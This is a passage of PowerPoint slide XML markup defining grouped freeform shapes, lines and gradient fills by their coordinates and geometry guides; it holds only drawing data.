                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 679"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 679 h 67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9" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603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09" name="Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2359"/>
                <a:ext cx="432" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 438"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 438 h 4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4" h="438">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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410" name="Group 2341"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4985058" y="3064808"/>
              <a:ext cx="981075" cy="863600"/>
              <a:chOff x="4604" y="2127"/>
              <a:chExt cx="618" cy="544"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="411" name="Freeform 1503"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5068" y="2210"/>
                <a:ext cx="154" cy="192"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2123"/>
                  <a:gd name="T1" fmla="*/ 2646 h 2646"/>
                  <a:gd name="T2" fmla="*/ 2123 w 2123"/>
                  <a:gd name="T3" fmla="*/ 0 h 2646"/>
                  <a:gd name="T4" fmla="*/ 2123 w 2123"/>
                  <a:gd name="T5" fmla="*/ 2076 h 2646"/>
                  <a:gd name="T6" fmla="*/ 0 w 2123"/>
                  <a:gd name="T7" fmla="*/ 2646 h 264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23"/>
                  <a:gd name="T13" fmla="*/ 0 h 2646"/>
                  <a:gd name="T14" fmla="*/ 2123 w 2123"/>
                  <a:gd name="T15" fmla="*/ 2646 h 264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23" h="2646">
                    <a:moveTo>
                      <a:pt x="0" y="2646"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2123" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2123" y="2076"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="264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12" name="Freeform 1504"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4758" y="2127"/>
                <a:ext cx="463" cy="275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 6375"/>
                  <a:gd name="T1" fmla="*/ 2643 h 3787"/>
                  <a:gd name="T2" fmla="*/ 2116 w 6375"/>
                  <a:gd name="T3" fmla="*/ 0 h 3787"/>
                  <a:gd name="T4" fmla="*/ 6375 w 6375"/>
                  <a:gd name="T5" fmla="*/ 1141 h 3787"/>
                  <a:gd name="T6" fmla="*/ 4259 w 6375"/>
                  <a:gd name="T7" fmla="*/ 3787 h 3787"/>
                  <a:gd name="T8" fmla="*/ 0 w 6375"/>
                  <a:gd name="T9" fmla="*/ 2643 h 37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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 3787"/>
                  <a:gd name="T17" fmla="*/ 6375 w 6375"/>
                  <a:gd name="T18" fmla="*/ 3787 h 37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5" h="3787">
                    <a:moveTo>
                      <a:pt x="0" y="2643"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2116" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6375" y="1141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4259" y="3787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="264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13" name="Line 1505"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="4913" y="2168"/>
                <a:ext cx="153" cy="19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14" name="Line 1506"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="4991" y="2190"/>
                <a:ext cx="154" cy="19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15" name="Line 1507"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="4837" y="2148"/>
                <a:ext cx="154" cy="192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16" name="Freeform 1508"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4913" y="2251"/>
                <a:ext cx="155" cy="192"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2124"/>
                  <a:gd name="T1" fmla="*/ 2648 h 2648"/>
                  <a:gd name="T2" fmla="*/ 2124 w 2124"/>
                  <a:gd name="T3" fmla="*/ 0 h 2648"/>
                  <a:gd name="T4" fmla="*/ 2124 w 2124"/>
                  <a:gd name="T5" fmla="*/ 2079 h 2648"/>
                  <a:gd name="T6" fmla="*/ 0 w 2124"/>
                  <a:gd name="T7" fmla="*/ 2648 h 264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24"/>
                  <a:gd name="T13" fmla="*/ 0 h 2648"/>
                  <a:gd name="T14" fmla="*/ 2124 w 2124"/>
                  <a:gd name="T15" fmla="*/ 2648 h 264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24" h="2648">
                    <a:moveTo>
                      <a:pt x="0" y="2648"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2124" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2124" y="2079"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="264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17" name="Freeform 1509"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4604" y="2168"/>
                <a:ext cx="463" cy="275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 6375"/>
                  <a:gd name="T1" fmla="*/ 2644 h 3787"/>
                  <a:gd name="T2" fmla="*/ 2116 w 6375"/>
                  <a:gd name="T3" fmla="*/ 0 h 3787"/>
                  <a:gd name="T4" fmla="*/ 6375 w 6375"/>
                  <a:gd name="T5" fmla="*/ 1141 h 3787"/>
                  <a:gd name="T6" fmla="*/ 4256 w 6375"/>
                  <a:gd name="T7" fmla="*/ 3787 h 3787"/>
                  <a:gd name="T8" fmla="*/ 0 w 6375"/>
                  <a:gd name="T9" fmla="*/ 2644 h 37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5"/>
                  <a:gd name="T16" fmla="*/ 0 h 3787"/>
                  <a:gd name="T17" fmla="*/ 6375 w 6375"/>
                  <a:gd name="T18" fmla="*/ 3787 h 37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5" h="3787">
                    <a:moveTo>
                      <a:pt x="0" y="2644"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2116" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6375" y="1141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4256" y="3787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="264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18" name="Line 1510"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="4758" y="2210"/>
                <a:ext cx="154" cy="192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19" name="Line 1511"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="4837" y="2231"/>
                <a:ext cx="154" cy="192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20" name="Line 1512"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="4682" y="2189"/>
                <a:ext cx="154" cy="192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21" name="Freeform 1513"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4913" y="2361"/>
                <a:ext cx="309" cy="310"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4247"/>
                  <a:gd name="T1" fmla="*/ 4274 h 4274"/>
                  <a:gd name="T2" fmla="*/ 0 w 4247"/>
                  <a:gd name="T3" fmla="*/ 1139 h 4274"/>
                  <a:gd name="T4" fmla="*/ 4247 w 4247"/>
                  <a:gd name="T5" fmla="*/ 0 h 4274"/>
                  <a:gd name="T6" fmla="*/ 4247 w 4247"/>
                  <a:gd name="T7" fmla="*/ 3135 h 4274"/>
                  <a:gd name="T8" fmla="*/ 0 w 4247"/>
                  <a:gd name="T9" fmla="*/ 4274 h 4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47"/>
                  <a:gd name="T16" fmla="*/ 0 h 4274"/>
                  <a:gd name="T17" fmla="*/ 4247 w 4247"/>
                  <a:gd name="T18" fmla="*/ 4274 h 42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47" h="4274">
                    <a:moveTo>
                      <a:pt x="0" y="4274"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4247" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4247" y="3135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="427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22" name="Freeform 1514"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4604" y="2360"/>
                <a:ext cx="309" cy="311"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4256"/>
                  <a:gd name="T1" fmla="*/ 0 h 4278"/>
                  <a:gd name="T2" fmla="*/ 0 w 4256"/>
                  <a:gd name="T3" fmla="*/ 3134 h 4278"/>
                  <a:gd name="T4" fmla="*/ 4256 w 4256"/>
                  <a:gd name="T5" fmla="*/ 4278 h 4278"/>
                  <a:gd name="T6" fmla="*/ 4256 w 4256"/>
                  <a:gd name="T7" fmla="*/ 1143 h 4278"/>
                  <a:gd name="T8" fmla="*/ 0 w 4256"/>
                  <a:gd name="T9" fmla="*/ 0 h 42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56"/>
                  <a:gd name="T16" fmla="*/ 0 h 4278"/>
                  <a:gd name="T17" fmla="*/ 4256 w 4256"/>
                  <a:gd name="T18" fmla="*/ 4278 h 42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56" h="4278">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="3134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4256" y="4278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4256" y="1143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23" name="Freeform 1515"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4833" y="2465"/>
                <a:ext cx="50" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="683" y="182"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="683" y="630"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="446"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="683" y="182"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="683" h="630">
                    <a:moveTo>
                      <a:pt x="683" y="182"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="683" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="182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hlink">
                      <a:gamma/>
                      <a:tint val="64706"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="hlink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sp>
            <p:nvSpPr>
              <p:cNvPr id="424" name="Freeform 1516"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4784" y="2451"/>
                <a:ext cx="49" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="685" y="185"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="685" y="631"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="447"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="685" y="185"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="685" h="631">
                    <a:moveTo>
                      <a:pt x="685" y="185"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="685" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="185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hlink">
                      <a:gamma/>
                      <a:tint val="64706"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="hlink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sp>
            <p:nvSpPr>
              <p:cNvPr id="425" name="Freeform 1517"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4634" y="2411"/>
                <a:ext cx="50" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="682" y="631"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="447"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="682" y="184"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="682" y="631"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="682" h="631">
                    <a:moveTo>
                      <a:pt x="682" y="631"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="631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hlink">
                      <a:gamma/>
                      <a:tint val="64706"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="hlink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sp>
            <p:nvSpPr>
              <p:cNvPr id="426" name="Freeform 1518"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4684" y="2425"/>
                <a:ext cx="50" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="685" y="182"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="685" y="631"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="447"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="685" y="182"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="685" h="631">
                    <a:moveTo>
                      <a:pt x="685" y="182"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="685" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="182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hlink">
                      <a:gamma/>
                      <a:tint val="64706"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="hlink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sp>
            <p:nvSpPr>
              <p:cNvPr id="427" name="Freeform 1519"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4734" y="2438"/>
                <a:ext cx="50" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="685" y="184"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="685" y="631"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="449"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="685" y="184"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="685" h="631">
                    <a:moveTo>
                      <a:pt x="685" y="184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="685" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="184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hlink">
                      <a:gamma/>
                      <a:tint val="64706"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="hlink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sp>
            <p:nvSpPr>
              <p:cNvPr id="428" name="Freeform 1520"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4632" y="2475"/>
                <a:ext cx="4" cy="123"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 56 w 56"/>
                  <a:gd name="T1" fmla="*/ 0 h 1696"/>
                  <a:gd name="T2" fmla="*/ 56 w 56"/>
                  <a:gd name="T3" fmla="*/ 1679 h 1696"/>
                  <a:gd name="T4" fmla="*/ 0 w 56"/>
                  <a:gd name="T5" fmla="*/ 1696 h 1696"/>
                  <a:gd name="T6" fmla="*/ 0 w 56"/>
                  <a:gd name="T7" fmla="*/ 16 h 1696"/>
                  <a:gd name="T8" fmla="*/ 56 w 56"/>
                  <a:gd name="T9" fmla="*/ 0 h 16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"/>
                  <a:gd name="T16" fmla="*/ 0 h 1696"/>
                  <a:gd name="T17" fmla="*/ 56 w 56"/>
                  <a:gd name="T18" fmla="*/ 1696 h 169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" h="1696">
                    <a:moveTo>
                      <a:pt x="56" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="1679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="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29" name="Freeform 1521"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4713" y="2497"/>
                <a:ext cx="5" cy="124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 73"/>
                  <a:gd name="T1" fmla="*/ 0 h 1698"/>
                  <a:gd name="T2" fmla="*/ 0 w 73"/>
                  <a:gd name="T3" fmla="*/ 1679 h 1698"/>
                  <a:gd name="T4" fmla="*/ 73 w 73"/>
                  <a:gd name="T5" fmla="*/ 1698 h 1698"/>
                  <a:gd name="T6" fmla="*/ 73 w 73"/>
                  <a:gd name="T7" fmla="*/ 19 h 1698"/>
                  <a:gd name="T8" fmla="*/ 0 w 73"/>
                  <a:gd name="T9" fmla="*/ 0 h 16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1698"/>
                  <a:gd name="T17" fmla="*/ 73 w 73"/>
                  <a:gd name="T18" fmla="*/ 1698 h 169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1698">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="1698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="19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0" name="Freeform 1522"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4631" y="2473"/>
                <a:ext cx="1" cy="125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 1715"/>
                  <a:gd name="T2" fmla="*/ 0 w 15"/>
                  <a:gd name="T3" fmla="*/ 1682 h 1715"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 1715 h 1715"/>
                  <a:gd name="T6" fmla="*/ 15 w 15"/>
                  <a:gd name="T7" fmla="*/ 35 h 1715"/>
                  <a:gd name="T8" fmla="*/ 0 w 15"/>
                  <a:gd name="T9" fmla="*/ 0 h 17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"/>
                  <a:gd name="T16" fmla="*/ 0 h 1715"/>
                  <a:gd name="T17" fmla="*/ 15 w 15"/>
                  <a:gd name="T18" fmla="*/ 1715 h 17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" h="1715">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3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1" name="Freeform 1523"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4632" y="2485"/>
                <a:ext cx="81" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T1" fmla="*/ 298 h 633"/>
                  <a:gd name="T2" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T3" fmla="*/ 633 h 633"/>
                  <a:gd name="T4" fmla="*/ 0 w 1110"/>
                  <a:gd name="T5" fmla="*/ 336 h 633"/>
                  <a:gd name="T6" fmla="*/ 0 w 1110"/>
                  <a:gd name="T7" fmla="*/ 0 h 633"/>
                  <a:gd name="T8" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T9" fmla="*/ 298 h 6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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 633"/>
                  <a:gd name="T17" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T18" fmla="*/ 633 h 6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10" h="633">
                    <a:moveTo>
                      <a:pt x="1110" y="298"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1110" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="2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2" name="Freeform 1524"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4632" y="2510"/>
                <a:ext cx="81" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T1" fmla="*/ 297 h 567"/>
                  <a:gd name="T2" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T3" fmla="*/ 567 h 567"/>
                  <a:gd name="T4" fmla="*/ 0 w 1110"/>
                  <a:gd name="T5" fmla="*/ 269 h 567"/>
                  <a:gd name="T6" fmla="*/ 0 w 1110"/>
                  <a:gd name="T7" fmla="*/ 0 h 567"/>
                  <a:gd name="T8" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T9" fmla="*/ 297 h 5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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 567"/>
                  <a:gd name="T17" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T18" fmla="*/ 567 h 56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10" h="567">
                    <a:moveTo>
                      <a:pt x="1110" y="297"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1110" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1110" y="29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3" name="Freeform 1525"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4632" y="2529"/>
                <a:ext cx="81" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T1" fmla="*/ 298 h 631"/>
                  <a:gd name="T2" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T3" fmla="*/ 631 h 631"/>
                  <a:gd name="T4" fmla="*/ 0 w 1110"/>
                  <a:gd name="T5" fmla="*/ 333 h 631"/>
                  <a:gd name="T6" fmla="*/ 0 w 1110"/>
                  <a:gd name="T7" fmla="*/ 0 h 631"/>
                  <a:gd name="T8" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T9" fmla="*/ 298 h 6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10"/>
                  <a:gd name="T16" fmla="*/ 0 h 631"/>
                  <a:gd name="T17" fmla="*/ 1110 w 1110"/>
                  <a:gd name="T18" fmla="*/ 631 h 6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10" h="631">
                    <a:moveTo>
                      <a:pt x="1110" y="298"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1110" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="333"/>
                    </a:lnTo>
